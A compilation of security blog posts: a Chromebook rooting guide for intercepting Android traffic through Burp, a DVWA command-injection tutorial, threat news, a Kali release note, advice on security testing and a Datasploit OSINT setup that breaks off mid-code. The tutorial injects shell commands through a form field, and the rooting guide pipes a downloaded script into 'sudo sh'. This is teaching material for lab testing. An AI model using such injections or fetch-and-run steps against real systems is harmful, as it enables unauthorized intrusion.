In conclusion, the major advantage of the http_hop listener is that it keeps an attacker from being identified on the target PC, as the said listener hides the original IP.

Author: Yashika Dhir is a passionate researcher and technical writer at Hacking Articles. She is a hacking enthusiast. Contact here

The post Hiding IP During Pentest using PowerShell Empire (http_hop) appeared first on Hacking Articles.

Why Is Penetration Testing Critical to the Security of the Organization?

A complete security program involves many different facets working together to defend against digital threats. To create such a program, many organizations spend much of their resources on building up their defenses by investing in their security configuration management (SCM), file integrity monitoring (FIM), vulnerability management (VM) and log management capabilities. These investments make sense, […]… Read More

The post Why Is Penetration Testing Critical to the Security of the Organization? appeared first on The State of Security.

Android App Testing on Chromebooks

Part of testing Android mobile applications is proxying traffic, just like other web applications.  However, since Android Nougat (back in 2016), user or admin-added CAs are no longer trusted for secure connections.  Unless the application was written to trust these CAs, we have no way of viewing the https traffic being passed between the client and servers.  Your only two options are to either buy a device running an older version of Android OS or to root your existing device.  Rooting a device can cause all sorts of issues and depending on your system may require a bit of effort and installation of other tools and utilities.  This is probably overkill just for adding a certificate.  Luckily, there is another option: Chromebooks. 

Google has been promoting the ability to install apps from the Google Play store since the middle of 2016.  Now, to proxy the traffic from an Android application, you will most likely still need to root the Android subsystem.  This is not always the case but, even if you do, rooting (and un-rooting) a Chromebook is remarkably easy.  Not to mention, you get a real keyboard and large screen!  However, before you run out and buy a Chromebook to use for testing, you should be aware of a few caveats:

  • Not all Chromebooks can run Android apps
  • Not all Android apps install on a Chromebook
  • Rooting the Android subsystem will wipe all existing user data on the Chromebook
  • Using Developer Mode will stop the Chromebook from installing most updates and prevent some applications from installing

Let’s walk through the process of getting the Burp CA cert added as a System CA on a Chromebook’s Android subsystem.  The whole process takes about an hour (depending on the speed of your Chromebook).  Before we start making any changes, be sure to copy any data you want to keep off of the Chromebook.  This process will wipe the device.

Enable Developer Mode
The method to get into development mode may be slightly different than what I list, depending on the Chromebook you are using.  I’m using an Asus R11. Please refer to Step 3 from the “Recover Your Chromebook” web page: https://support.google.com/chromebook/answer/1080595 for methods for other devices.

  1. Press ESC, Refresh, and the power button at the same time to load Recovery Mode.
  2. When the Recovery Mode screen loads, press Ctrl+D and then Enter
  3. The system will reboot and you will see the OS Verification warning screen.  Press Ctrl+D again.  From this point forward, until you revert back to a verified OS, you will have to press Ctrl+D at every boot up.
  4. Wait for about 15 minutes while the Chromebook prepares the Developer mode

Enable Debugging Features
This does not need to be done, but I highly recommend it so you can get a full bash terminal session through crosh (the Chrome OS shell).  This must be done on the first boot up after the Chromebook finishes installing Developer mode.

The Chromebook will reboot and then prompt you for a root password.

Set sudo Password for the Dev Console in crosh
At this point, sign in to the Chromebook as normal.  Let the system create your profile and load the Google Play store.  Depending on your Google and Chrome settings, you may need to wait a bit as applications are automatically installed.

  1. Press Ctrl+Alt+F2 (or the Forward -> button) to get to the Developer Console.
  2. Login with root and the password you previously set up
  3. Type chromeos-setdevpasswd and press Enter.  You will be prompted for the sudo password.
  4. Type logout and press Enter
  5. Press Ctrl+Alt+F1 (or the Back <- button) to go back to the main screen

Disable OS Checks and Hardening
Before we can actually root the Chromebook, we need to disable some security settings.

  1. Press Ctrl+Alt+t to open the crosh window
  2. Type shell and press Enter to load a full shell
  3. Type sudo crossystem dev_boot_signed_only=0 and press Enter
  4. Type sudo /usr/libexec/debugd/helpers/dev_features_rootfs_verification and press Enter
  5. Reboot the Chromebook
    1. sudo reboot
  6. Once the system comes back, open another terminal window (Ctrl+Alt+t >> shell)
  7. Run the following command:  sudo /usr/share/vboot/bin/make_dev_ssd.sh --remove_rootfs_verification --partitions $(( $(rootdev -s | sed -r 's/.*(.)$/\1/') - 1))
  8. Reboot the Chromebook (sudo reboot)

“Root” the Android Subsystem
Up until this point, we’ve just been prepping the system.  Running the following command will copy my modified script from GitHub and create an editable partition we can add items to (such as new CA certs).

curl -Ls https://gist.githubusercontent.com/neKuehn/f8eb14b226d42cda73ce173c0cdb2970/raw/5ae555f6156467741e8efbb40bc81eecb045a7e8/RootChromebookAndroid.sh | sudo sh

This script was modified from work that nolirium created (https://nolirium.blogspot.com/2016/12/android-on-chrome-os-rooting-shell.html).  My version does not add in the extra tools (BusyBox, etc) included in the original.

Once the script finishes (as shown above), reboot once again.  Once the Chromebook comes back online, we can install the Burp cert.

Configuring Android subsystem to use the Burp Certificate
We’re almost done but this portion takes multiple steps.  This is mainly because the Android subsystem wants the cert to be in a different format and named a specific way.

  1. Download the certificate from Burp and copy it to the Chromebook.  If you copy the cert to the Downloads directory on the Chromebook, the path (in a shell window) is /home/user/<randomstring>/Downloads.  All of my following examples assume you downloaded the certificate to the Downloads directory
  2. Convert the cert to one used by Android (this can be done on linux system or on the Chromebook itself in a terminal window):
                openssl x509 -inform der -in cacert.der -out burp.pem
  3. Import the burp.pem file as an Authority in Chrome.  This is done in the GUI.
    1. Open Settings
    2. Expand “Advanced”
    3. Click on Manage Certificates
    4. Select the Authorities tab
    5. Click on Import.
    6. Find the burp.pem file and import it.
      1. Select all 3 check boxes for the Trust settings and click on OK
    7. Validate that the org-PortSwigger CA is now listed (as shown below)
  4. The CA should now also be listed as an Android User certificate
    1. Open Settings
    2. Click on the Google Play Store settings -> Manage Android preferences
    3. Click on Security
    4. Click on Trusted credentials
    5. Click on the User tab
    6. Validate the certificate is there as well. 
    7. If the cert is not listed, you can import the certificate by following the next few steps:
      • Go back to the Security menu
      • Select Install from SD card
      • Select Downloads in the Open from window
      • Select the burp.pem file and give it a name
      • The cert should now be listed as a Trusted User Credential
  5. Find the name of the certificate that was added to Android
    1. Open a shell (Ctrl+Alt+t and then shell) and run:
        sudo ls /opt/google/containers/android/rootfs/android-data/data/misc/user/0/cacerts-added
    2. Take note of the file name.  In my case, it is 9a5ba575.0.  We will be using this name for our new System CA certificate file we are about to create.  (A way to derive this name directly is shown in the sketch after this list.)
  6. Create the properly formatted certificate file. (This can be done on a linux server or on the Chromebook itself.  Where ever you created the burp.pem file):
     cat burp.pem > 9a5ba575.0
  7. Append the cert text to the file:
      openssl x509 -inform PEM -text -in burp.pem -out /dev/null >> 9a5ba575.0
  8. Copy our new cert file to the Android system:
      cp /home/user/<randomstring>/Downloads/9a5ba575.0 /opt/google/containers/android/rootfs/root/system/etc/security/cacerts/
  9. Reboot
  10. Validate that the PortSwigger CA is now listed in the Trusted Systems
    1. Open Settings
    2. Click on the Google Play Store settings -> Manage Android preferences
    3. Click on Security
    4. Click on Trusted credentials
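
As an aside to step 5 above, the expected file name can also be derived directly from the PEM file, since Android names CA certificate files after the certificate’s old-style subject hash:

openssl x509 -inform PEM -subject_hash_old -in burp.pem | head -1

The first line of output is the hash (9a5ba575 in my case); append .0 to get the file name.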

You should now be able to proxy your traffic through Burp and intercept https traffic!  Often, when I do this, I send the data to my other laptop.  This is so I can save all of the proxy information (including required exclusions for android / google) to a dedicated wifi connection.  This is the current list of exclusions, but it is always growing:

  • accounts.google.com
  • accounts.google.us
  • accounts.gstatic.com
  • accounts.youtube.com
  • alt*.gstatic.com
  • clients1.google.com
  • clients2.google.com
  • clients3.google.com
  • clients4.google.com
  • commondatastorage.googleapis.com
  • cros-omahaproxy.appspot.com
  • dl.google.com
  • dl-ssl.google.com
  • gweb-gettingstartedguide.appspot.com
  • m.google.com
  • omahaproxy.appspot.com
  • pack.google.com
  • policies.google.com
  • safebrowsing-cache.google.com
  • safebrowsing.google.com
  • ssl.gstatic.com
  • storage.googleapis.com
  • tools.google.com
  • www.googleapis.com
  • www.gstatic.com

Returning to Normal
Reverting back to the normal state is very easy.  First off, copy off the custom cert files (as they will be named the same thing if you choose to do this process again later).  Then perform the following steps:

  1. Run this command to put back the default Android Image:
      sudo mv /opt/google/containers/android/system.raw.img.bk /opt/google/containers/android/system.raw.img
  2. Reboot the Chromebook
  3. When the system boots to the OS Verification screen, instead of pressing Ctrl+D, press the spacebar.  This will wipe the Chromebook and put it back to the default configuration.

If you run into extreme issues, you should be able to powerwash the device.  At worst, you will have to reinstall the OS, which takes about an hour but is much easier on a Chromebook than on other Android systems.  The full process to recover a Chromebook can be found here: https://support.google.com/chromebook/answer/1080595?hl=en.

Threat Actor Using Fake LinkedIn Job Offers to Deliver More_eggs Backdoor

Security researchers discovered that a threat actor is targeting LinkedIn users with fake job offers to deliver the More_eggs backdoor.

Since mid-2018, Proofpoint has observed various campaigns distributing More_eggs, each of which began with a threat actor creating a fraudulent LinkedIn profile. The attacker used these accounts to contact targeted employees at U.S. companies — primarily in retail, entertainment, pharmaceuticals and other industries that commonly employ online payments — with a fake job offer via LinkedIn messaging.

A week after sending these messages, the attacker contacted the targeted employees directly using their work email to remind them of their LinkedIn correspondence. This threat actor incorporated the targets’ professional titles into subject lines and sometimes asked recipients to click on a link to a job description. Other times, the message contained a fake PDF with embedded links.

These URLs all pointed to a landing page that spoofed a legitimate talent and staffing management company. There, the target received a prompt to download a Microsoft Word document that downloaded the More_eggs backdoor once macros were enabled. Written in JScript, this backdoor malware is capable of downloading additional payloads and profiling infected machines.

A Series of Malicious Activities on LinkedIn

The threat actor responsible for these campaigns appears to have had a busy 2019 so far. Proofpoint found ties between these operations and a campaign first disclosed by Krebs on Security in which phishers targeted anti-money laundering officers at U.S. credit unions. Specifically, the security firm observed similar PDF email attachments and URLs all hosted on the same domain.

This isn’t the first time an online actor has used LinkedIn for malicious activity, either. Back in September 2017, Malwarebytes Labs found evidence of attackers compromising people’s LinkedIn accounts and using them to distribute phishing links via private messages. Less than a year later, Alex Hartman of Network Solutions, Inc. disclosed a similar campaign in which threat actors attempted to spread malware via LinkedIn using fake business propositions.

How to Defend Against Backdoors Like More_eggs

Security professionals can help defend against backdoors like More_eggs by consistently monitoring endpoints and devices for suspicious activity. Security teams should simultaneously use real-time compliance rules to automate remediation in the event they observe behavior that appears to be malicious.

Additionally, experts recommend testing the organization’s phishing defenses by contacting a reputable penetration testing service that employs the same tactics, techniques and procedures (TTPs) as digital criminals.

The post Threat Actor Using Fake LinkedIn Job Offers to Deliver More_eggs Backdoor appeared first on Security Intelligence.

UPDATE: Kali Linux 2019.1 Release!

PenTestIT RSS Feed

Kali Linux 2019.1 is the latest Kali Linux release. This is the first release of 2019 and comes after Kali Linux 2018.4, which was made available in October. This new release includes all patches, fixes, updates, and improvements since then, including a shiny new Linux kernel version 4.19.13 and upgrades to a lot of tools. Importantly, it also includes support for the Banana Pi and Banana Pro.

Kali Linux 2019.1

What’s new in Kali Linux 2019.1?

The biggest tool update is Metasploit 5.0, which includes database and automation APIs, new evasion capabilities, and a lot of usability improvements. As mentioned earlier, this version now supports Banana Pi and Banana Pro ARM devices. Moreover, it includes updated packages for theHarvester 3.0.0, DBeaver 5.2.3, and more.

The following bugs have also been quashed in Kali Linux 2019.1:

  • 0005194 [General Bug] System failed to boot after upgrading udev (rhertzog)
  • 0005124 [Kali Package Bug] Failed to start LSB: thin initscript (rhertzog)
  • 0004994 [General Bug] Gnome may require entropy (slow login) (rhertzog)
  • 0005051 [General Bug] vmtoolsd starting too early (rhertzog)
  • 0005011 [General Bug] Xfce freezes (rhertzog)
  • 0005096 [Kali Package Bug] Freeradius-wpe package has unmet dependencies (sbrun)
  • 0005085/0005061 [General Bug] xfsettingsd (in the xfce4-settings package) caused high CPU load every 2 or 3 seconds (steev)
  • 0005086/0004970 [Kali Package Improvement] For Peepdf functionality, build and add the PyV8 package to the Kali repo (sbrun)
  • 0005087/0005064 [Kali Package Bug] Metasploit function ‘info’ bug (sbrun)
  • 0004996 [Kali Package Bug] Get rid of python-restkit in Kali (rhertzog)
  • 0005254 [General Bug] WPScan does not start (sbrun)

Download Kali Linux 2019.1:

As we all know, you can simply run apt update && apt -y full-upgrade to update to the latest Kali Linux version. Or, if you would like to download ISO images (kali-linux-2019.1-amd64.iso/kali-linux-2019.1-i386.iso), visit this page. However, if you want to download VMware, VirtualBox, Hyper-V or ARM images (such as Kali-Linux-2019.1-vm-amd64.7z), simply go to this page.

Do not forget to check out the updated official Kali Linux documentation too! Also, don’t forget to check out the online version of the Kali Linux Revealed book here.

The post UPDATE: Kali Linux 2019.1 Release! appeared first on PenTestIT.

OWASP’s Most Wanted

So you ask who is this OWASP and why do I care?

Well, let’s hear it directly from them:  “Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software.  Our mission is to make software security visible, so that individuals and organizations are able to make informed decisions. OWASP is in a unique position to provide impartial, practical information about AppSec to individuals, corporations, universities, government agencies, and other organizations worldwide.  Operating as a community of like-minded professionals, OWASP issues software tools and knowledge-based documentation on application security.” (https://OWASP.org)

Whether you’re a pentester or a developer, you should be well versed in OWASP and the information they provide.  One of their most well-known offerings is the Top 10 Application Security Risks, and OWASP lists Injection as the #1 vulnerability on that list.

So, what is Injection?  According to OWASP, Injection can result in data loss or corruption, a lack of accountability or a denial of access.  This is done by breaking out of a fixed context within the page. For example, if the page expects user input to only be used in a non-executable context, but an attacker can escape that context, then the input might be executable. Things like SQL injection (SQLi) and Cross-site Scripting (XSS) are common examples of injection. In XSS, an unhandled quote character might break out of the HTML attribute and allow malicious JavaScript to execute in the browser. With SQLi, an unhandled SQL control character may allow a malicious SQL statement to execute against the database. A quick list of different attacks can be found on OWASP’s Attack Category page: https://www.owasp.org/index.php/Category:Injection.

Today, let’s look at Command Injection together.  This occurs when the data added to the input contains code the attacker wants to be run by the operating system of the system hosting the vulnerable web page or application.

So, let’s see how this attack works in an application and how we can exploit it.  I will be using SamuraiWTF in this demonstration. You can download the current release of Samurai from GitHub.

Once I have Samurai loaded up I am going to launch Burp.  As shown below, Burp can be found by right-clicking on the screen in the VM.


As an aside, if you have never used Burp before, I recommend taking a look at another one of our posts found at the following link: https://blog.secureideas.com/2018/03/burp-suite-continuing-the-saga.

Once I have Burp running, I want to set up my Firefox browser to use Burp. Make sure you change your proxy configuration, as shown below, so all traffic will be routed through Burp.

Also I need to make sure Intercept is turned off in Burp. Otherwise, Burp will hold all web requests and wait for you to manually forward them to the server.

Next I open up the DVWA application by typing http://dvwa.wtf in my Firefox browser.  Now I need to go through and map out the application by clicking on every function in the application. Additionally, for this example to work, I need to change the security level to Low.

Once I have mapped out each function I can go back to Burp, look at the Site map tab under the Target tab, and find the POST request from http://dvwa.wtf/vulnerabilities/exec/.

Now I am going to send that request to Repeater to manipulate it. My goal is to break out of the context in which the application is executing. (Note the Content-Length of the request to compare it later.)

As a quick tip, when using Repeater you always want to press the Go button prior to manipulating the request. This allows us to verify that the session is still good and that there are no anti-replay protections.

Now we are going to input a payload into the request to see what happens. I am going to replace ip=localhost&Submit=Submit with ip=localhost;ls -l / ; whoami; uname -a&Submit=Submit. Notice that I am adding commands separated by semi-colons to attempt to break out of the context in which the application runs the payload. You can use any system commands, but ones like these, which return output and aren’t interactive, are often best.
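
The same injection can also be reproduced outside of Burp with curl; a hedged sketch (the cookie values are assumptions and must be taken from your own authenticated session):

curl -s 'http://dvwa.wtf/vulnerabilities/exec/' \
  --cookie 'security=low; PHPSESSID=<your-session-id>' \
  --data-urlencode 'ip=localhost; ls -l /; whoami; uname -a' \
  --data 'Submit=Submit'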

I then press the Go button to have Burp Suite send the request to the application. If I look at the response, we can see the payload appears to have executed: the response contains the output from the commands I injected. In the screenshot below, we see the directory listing and that the application is running as root.

So that shows an example of how Command Injection can be found and exploited.  Stay tuned to https://blog.secureideas.com for more great articles and tutorials similar to this one.  You can also join our Slack channel at www.professionallyevil.com where you can chat with fellow security professionals.


Introduction to Pentesting: From n00b to Professional

So, you want to become a pentester? Penetration testing is not only a financially rewarding career; professionals in this field also find it personally fulfilling. It does, however, require some serious skills to get there! Here’s an introduction to penetration testing and how to take your first step in this field.

Why Penetration Testing Is Important

Penetration testing (pentesting) consists of testing a computer system, network, web application, etc. to find security vulnerabilities before malicious actors do. In other words, penetration testers perform ‘deep investigations’ of a remote system’s security flaws.

This activity requires methodology and skills. Penetration testers, unlike malicious hackers, must test for any and all vulnerabilities, not just the ones that might grant them root access to a system.

Penetration testing is NOT about getting root!!!

The ultimate goal of penetration testers is not to get access as fast as possible, but to thoroughly identify the security posture of an organization and recommend the right solution(s) to fix the vulnerabilities found.

The most important part of the penetration testing methodology, the reporting phase, is often the most overlooked. That’s a BIG mistake! Indeed, clients will usually judge a pentester’s work based on the quality of the report. This is why writing skills can really come in handy, but more on the skills necessary to succeed in this field later in this article.

Penetration testers, moreover, must take care not to destroy their clients’ infrastructures. Pentesting therefore requires a thorough understanding of attack vectors and their potential impact.

In an ever-more connected world, everything can be tested. Here are some of the most common types of pentests:

  • Network Pentesting,
  • Wireless Network Pentesting,
  • Web Application Pentesting,
  • Mobile Application Pentesting,
  • Wifi Pentesting,
  • System Pentesting,
  • Servers Pentesting,
  • IoT Pentesting,
  • Cloud-based Application Pentesting,

But also…

  • Humans/employees can be an organization’s weakest link. To ensure that all employees are aware of the risks, and to keep a company secure, penetration testers might be asked to perform social engineering tests.

Learn the basics of social engineering and how to use popular credential grabbing tools like Modlishka and SET in this webinar by The Ethical Hacker Network and Erich Kron of KnowBe4.

Needless to say, pentesting is a highly practical job! To become a penetration tester, you’ll need to learn the theories, methodologies and, most importantly, the hands-on techniques to carry out your tasks.

Below are some of the most important skills to get you started.

The Skills Penetration Testers Need To Succeed

To become a junior penetration tester, you’ll need to have a strong understanding of the networking basics:

  • Routing, Forwarding, TCP/IP
  • Traffic analysis with Wireshark

But also know the pentesting methodology:

  • Information gathering
  • Footprinting and scanning
  • Vulnerability assessments
  • Exploitation 
  • Reporting

And most importantly, know the most common hacking techniques and tools by heart:

  • How web attacks work
  • Basic usage of Nmap, Nessus, BurpSuite, and Metasploit
  • Understanding Buffer Overflows
  • How XSS and SQL Injection work
  • How to hack the human brain (social engineering)

Want to learn the skills and techniques mentioned above? Skip to the next part to see how you can get started.

How To Get Started?

So, you want to become a penetration tester? You might just be in luck!

On the occasion of our Beginners’ Month, we are offering the Penetration Testing Student (PTS) training course in Elite Edition for free with every enrollment in the Penetration Testing Professional (PTP) training course.

Combined, these two best-selling training courses will take you from script kiddie to a more advanced and professional penetration tester level.

We pride ourselves in offering highly practical and self-paced training courses, so you’ll be able to learn new penetration testing skills and techniques from the comfort of your home, at your own pace.

By enrolling in these two courses, you’ll get lifetime access to:

  • Thousands of slide course materials,
  • Hundreds of video course materials,
  • Hours of virtual labs based on real-life scenarios,
  • A shiny certificate to prove your practical skills!

Yes, that’s right! You’ll get the chance to prove your skills and become a certified eLearnSecurity Junior Penetration Tester (eJPT) after completing the PTS training course, and an eLearnSecurity Certified Professional Penetration Tester (eCPPT) after the PTP training course.

Aspiring to become a professional Penetration Tester? Enroll in PTPv5 in Elite Edition before February 28 to receive PTS in Elite Edition at no additional cost!
CLAIM YOUR FREE COURSE | GET A FREE TRIAL

Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

How to Test Your Security Controls for Small/Medium Businesses

We often get contacted by small businesses requesting their first penetration test because of compliance reasons, or because of “industry best practices,” or just to get an idea of how bad things really are. In many of those cases, their environment isn’t nearly mature enough to make a pentest worthwhile. Sometimes they’re insistent and we work with them to make the test as helpful as we can, but usually that’s like shooting fish in a barrel.  

Over the years I’ve found that a better approach is to discuss the motives for getting a pentest, and then explore other options that might be more efficient and effective. While this might cost us a sale, in the long run it’s better for the client, and ultimately makes them a better customer.  And let’s be honest, while it’s fun to get Domain Admin access by 10am Monday morning, that usually makes for a pretty boring test. So this article is intended to be a roadmap for those smaller businesses, to guide them towards an improved security posture.

The first step is to get the horse in front of the cart: we need to understand the point of security testing so that we’re not just testing for the sake of the test. Even if the compliance auditors are forcing the engagement, there’s no reason not to get the most bang for your buck. All tests are designed to determine whether or not the subject is performing as expected. Whether it’s a standardized test in grade school, a drug test, or a penetration test, the ultimate goal is always to determine whether our expectations match reality.

In your business or organization, you’ve spent countless hours and dollars on security controls to protect your assets. The simple goal of any security testing should be to confirm if those controls are successful at lowering risk. If they’re not, then you may need to rethink how you’re allocating those resources. And if the controls are successful, good testing will help you find the limits of those controls and where additional efforts are required.

So, where do we start?  If the goal is to assess the success of your controls, then you need to document those controls and outline the threats they are expected to mitigate. It’s also good to brainstorm other potential threats to the organization. Possible threats can include anything that could cost the organization time, money or manpower, as well as anything that could hinder future sales, such as downtime and negative press. It’s important to have a strong understanding of every possible threat so that you can map specific security controls to addressing those threats.

This can often be done internally if you have competent staff, but may benefit from the assistance of a knowledgeable third party. At Secure Ideas we call this a Gap Analysis. The goal of that sort of assessment is to get a very high-level understanding of the controls in place with an eye towards finding gaps in coverage.

Once you have an outline of possible threats, and a list of security controls that are intended to prevent those threats, you can start to look for areas of weakness. There’s really no limit to how simple or sophisticated this testing needs to be. For example, if you have a firewall with a built-in IPS service that’s supposed to block network scanning, then you can perform a network scan with a tool like nmap and see what happens.  I gave a talk at ShowMeCon 2018 on how to assess third party MSSPs in this way, but the principles apply to testing your own controls as well. You can view that here: https://www.youtube.com/watch?v=_SF4vw_mVnY
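
For example, a first pass against that IPS claim might be as simple as the following sketch (the target address is a placeholder; only scan systems you own or are authorized to test):

# TCP SYN scan of the first 1024 ports; run as root, then watch whether the IPS alerts, throttles or blocks it
nmap -sS -Pn -p 1-1024 192.0.2.10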

For more advanced organizations, we also perform Architecture Reviews that are a bit more involved than a Gap Analysis.  These are interview-based assessments in cooperation with the client’s staff in which we discuss all of the different areas of information security. During an Arch Review, we review any available documentation (policies & procedures, configuration standards, etc) looking for areas that haven’t received a proper amount of focus. The goal of the Arch Review is to get as much detail from as many different employees as possible. This allows us to find those places where the actual work doesn’t always line up with the documented procedures.

Another option is to perform a Vulnerability Assessment. This is often done in conjunction with an Architecture Review. This assessment usually involves the use of an automated scanner on the client’s network. For clients that are already doing regular vulnerability scans, the focus of this type of assessment may lean towards analyzing existing scan data as well as reviewing the scanner configuration. For clients who aren’t performing regular scanning, this assessment can help determine whether the expected procedures such as patching and upgrades are actually being followed.

And finally, for organizations that are fairly confident in their existing controls, the Penetration Test is designed to simulate a real-world attack, to exploit vulnerabilities, and to plunder and pillage sensitive data. There are several different types of penetration tests with focuses on internal or external networks, web applications, mobile applications, wireless, etc. But they all have the same overarching goal: to assess the security of the target systems and demonstrate real-world business risk so that executives can accurately understand the potential costs of an attack.

In my experience, many organizations that come to us for their first penetration test aren’t ready for it.  They’re moving down that path, but they’re not at the point of having reasonable confidence in their existing controls. Sometimes they don’t have a choice because of compliance/legal/regulations/etc. But sometimes they do. I always try to open up the discussion to better understand the goals of the testing and what they’re hoping to receive.  

In general, my advice is for organizations to review the CIS 20 Controls (https://www.cisecurity.org/controls/). If they can’t put a checkmark beside most of those controls, then we probably need to start further up the chain with something like an Architecture Review. One of the advantages of partnering with a company like Secure Ideas is that we have the experience and flexibility to craft an assessment that meets each unique customer. Regardless of where they are along the path of becoming more secure, we love having the opportunity to make our clients better.

If you’re trying to up your security game, or aren’t sure exactly how to proceed, let us know. You can reach me directly at nathan@secureideas.com.

HIMSS 2019 – Champions of Security Unite

Organizations of all sizes and industries face increasing challenges in safeguarding vast amounts of sensitive data, and healthcare is no different. The loss of Protected Health Information (PHI) incurs not only heavy fines and brand damage, but potentially everlasting damage to affected patients.

According to the Ponemon Institute, the average total cost of a data breach went up 6.8 percent in 2018, to an average of $3.86 million. The financial burden shouldered by these businesses is why we do our best to get out in front of an attack by being proactive rather than reactive.  A mature and resilient security posture can only be achieved by taking the necessary precautions, having the proper controls in place, and relying on industry experts.

Security Challenges Faced by Healthcare Organizations

A dedicated, persistent, and sophisticated attacker is attracted to valuable medical and identity information, and won’t be thwarted easily, which is why an organization must remain vigilant.  Complex and vast regulatory expectations require increased focus and budget dollars to comply with HIPAA security and privacy requirements.  Without a strong security program in place, it becomes increasingly likely that a successful attack against your organization is on the horizon.

Reduce Your Threat Level and Enhance Your Security Posture

Healthcare organizations need to manage a constantly evolving IT environment and threat landscape. Understanding the exposure of not only their physical environment, but also virtual networks, cloud services, mobile devices, medical devices, and web applications can be quite daunting. Risks need to be identified and prioritized as they emerge, based on the specific requirements of the organization.

Secure Ideas Has Solutions to Help

The first step in finding a solution is to be cognizant of the current situation. A security architecture review takes a collaborative approach to understanding the vast IT architecture that exists and the reasons for various design decisions. We'll work with your organization to identify and control vulnerabilities and gaps in configurations, policies, procedures, and controls. Crafted from decades of experience, our services are specifically designed not only to identify vulnerabilities, but to provide actionable recommendations and to promote a Security State of Mind.

Find Secure Ideas at HIMSS: 

If you'll be attending HIMSS February 11-15th and would like to stop by our booth for a more in-depth conversation on ways we can assist your organization, we'd be happy to speak with you further. You can find us at Booth #6485.

Secure Ideas CEO, Kevin Johnson, will also be speaking at HIMSS:
Attacking the Ramparts: Offensively Securing Your Organization
Thursday, February 14th – 1:15pm – 2:00pm
Orange County Convention Center
Hall A
Booth 400
Cybersecurity Theater A

#MyInfoSecStory Contest: Win The Course Of Your Choice

Has eLearnSecurity or one of our training courses helped you or your career? We'd love to hear that story! Get a chance to win your favorite course this month with our #MyInfoSecStory LinkedIn contest. Discover how to enter and the guidelines for your chance to win below.


Get your keyboards in order — Ready, set, go!



Toolsmith #127: OSINT with Datasploit

I was reading an interesting Motherboard article, Legal Hacking Tools Can Be Useful for Journalists, Too, which includes a reference to one of my all-time OSINT favorites, Maltego. Joseph Cox's article also mentions Datasploit, a 2016 favorite of fellow tools aficionado Toolswatch.org; see 2016 Top Security Tools as Voted by ToolsWatch.org Readers. Since I hadn't yet explored Datasploit myself, this proved to be a grand case of "no time like the present."
Datasploit is "an #OSINT Framework to perform various recon techniques, aggregate all the raw data, and give data in multiple formats." More specifically, as stated on the Datasploit documentation page under Why Datasploit, it utilizes various Open Source Intelligence (OSINT) tools and techniques found to be effective, and brings them together to correlate the raw data captured, providing the user relevant information about domains, email addresses, phone numbers, personal data, etc. Datasploit is useful for collecting relevant information about a target in order to expand your attack and defense surface very quickly.
The feature list includes:
  • Automated OSINT on domain / email / username / phone for relevant information from different sources
  • Useful for penetration testers, cyber investigators, defensive security professionals, etc.
  • Correlates and collates results, showing them in a consolidated manner
  • Tries to find out credentials, API keys, tokens, sub-domains, domain history, legacy portals, and more related to the target
  • Available as a single consolidated tool as well as standalone scripts
  • Performs Active Scans on collected data
  • Generates HTML, JSON reports along with text files
Resources
Github: https://github.com/datasploit/datasploit
Documentation: http://datasploit.readthedocs.io/en/latest/
YouTube: Quick guide to installation and use

Pointers
Next, a few pointers to keep you from losing your mind. This project is very much a work in progress, with lots of very frustrated users filing bugs and wondering where the support is. The team is doing their best; be patient with them, but read through the Github issues to be sure any bugs you run into haven't already been addressed.
1) Datasploit does not error gracefully; it just crashes. This can be the result of unmet dependencies or even a missing API key. Do not despair, take note, I'll talk you through it.
2) For ease, and the best match to the documentation, I suggest running Datasploit from an Ubuntu variant. Your best bet is to grab Kali, as a VM or a dedicated install, and load it up there, as I did.
3) My installation guidance and recommendations should hopefully get you running trouble free, follow it explicitly.
4) Acquire as many API keys as possible, see further detail below.

Installation and preparation
From Kali bash prompt, in this order:

  1. git clone https://github.com/datasploit/datasploit /etc/datasploit
  2. apt-get install libxml2-dev libxslt-dev python-dev lib32z1-dev zlib1g-dev
  3. cd /etc/datasploit
  4. pip install -r requirements.txt
  5. mv config_sample.py config.py
  6. With your preferred editor, open config.py and add API keys for the following at a minimum; they are, for all intents and purposes, required, and detailed instructions for acquiring each are in the Datasploit documentation (a sketch of the populated file follows this list):
    1. Shodan API
    2. Censysio ID and Secret
    3. Clearbit API
    4. Emailhunter API
    5. Fullcontact API
    6. Google Custom Search Engine API key and CX ID
    7. Zoomeye Username and Password
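For orientation, here's a minimal sketch of what the populated config.py might look like. The variable names below are illustrative assumptions on my part; match them to the placeholder names actually shipped in config_sample.py.

    # config.py (sketch) -- variable names are assumptions for illustration;
    # use the placeholder names present in your own config_sample.py
    shodan_api = "YOUR_SHODAN_API_KEY"
    censysio_id = "YOUR_CENSYS_ID"
    censysio_secret = "YOUR_CENSYS_SECRET"
    clearbit_apikey = "YOUR_CLEARBIT_API_KEY"
    emailhunter = "YOUR_EMAILHUNTER_API_KEY"
    fullcontact_api = "YOUR_FULLCONTACT_API_KEY"
    google_cse_key = "YOUR_GOOGLE_CSE_API_KEY"
    google_cse_cx = "YOUR_GOOGLE_CSE_CX_ID"
    zoomeye_user = "YOUR_ZOOMEYE_USERNAME"
    zoomeye_pass = "YOUR_ZOOMEYE_PASSWORD"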
If, and only if, you've done all of this correctly, you might end up with a running instance of Datasploit. :-) Seriously, this is some of the glitchiest software I've tussled with in quite a while, but the results paid off handsomely. Run python datasploit.py domain.com, where domain.com is your target. Obviously, I ran python datasploit.py holisticinfosec.org to acquire results pertinent to your author.
Datasploit rapidly pulled results as follows:
211 domain references from Github.
Luckily, no results from Shodan. :-)
Four results from pastes (Pastebin and Pastie).
Datasploit pulled russ at holisticinfosec dot org as expected, per email harvesting.
Accurate HolisticInfoSec host location data from Zoomeye.

Details regarding HolisticInfoSec sub-domains and page links were returned as well.
Finally, a good return on DNS records for holisticinfosec.org and, thankfully, no vulns found via PunkSpider.

DataSploit can also be integrated into other code and called as individual scripts for unique functions. I did a quick run with python emailOsint.py russ@holisticinfosec.org and the results were impressive.
I love that the first query is of Troy Hunt's Have I Been Pwned. Not sure if you have been? Better check it out. A reminder here: you'll really want to have as many API keys as possible, or you may find these buggy scripts crashing. You'll definitely find yourself weighing the frustration against the rapid, detailed results. I put this offering squarely in the "shows much promise" category, provided the devs keep focus on it, assess for quality, and handle errors better.
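If you want to drive one of the standalone scripts from your own tooling rather than the shell, a minimal wrapper like the sketch below is one way to do it. It assumes the /etc/datasploit clone from the installation steps above, and that each script takes its target as its first positional argument, matching the emailOsint.py run shown here.

    # Minimal sketch: driving a standalone Datasploit script from other code.
    # Assumes the /etc/datasploit checkout created during installation and
    # that the script accepts its target as the first positional argument.
    import subprocess

    def run_email_osint(email):
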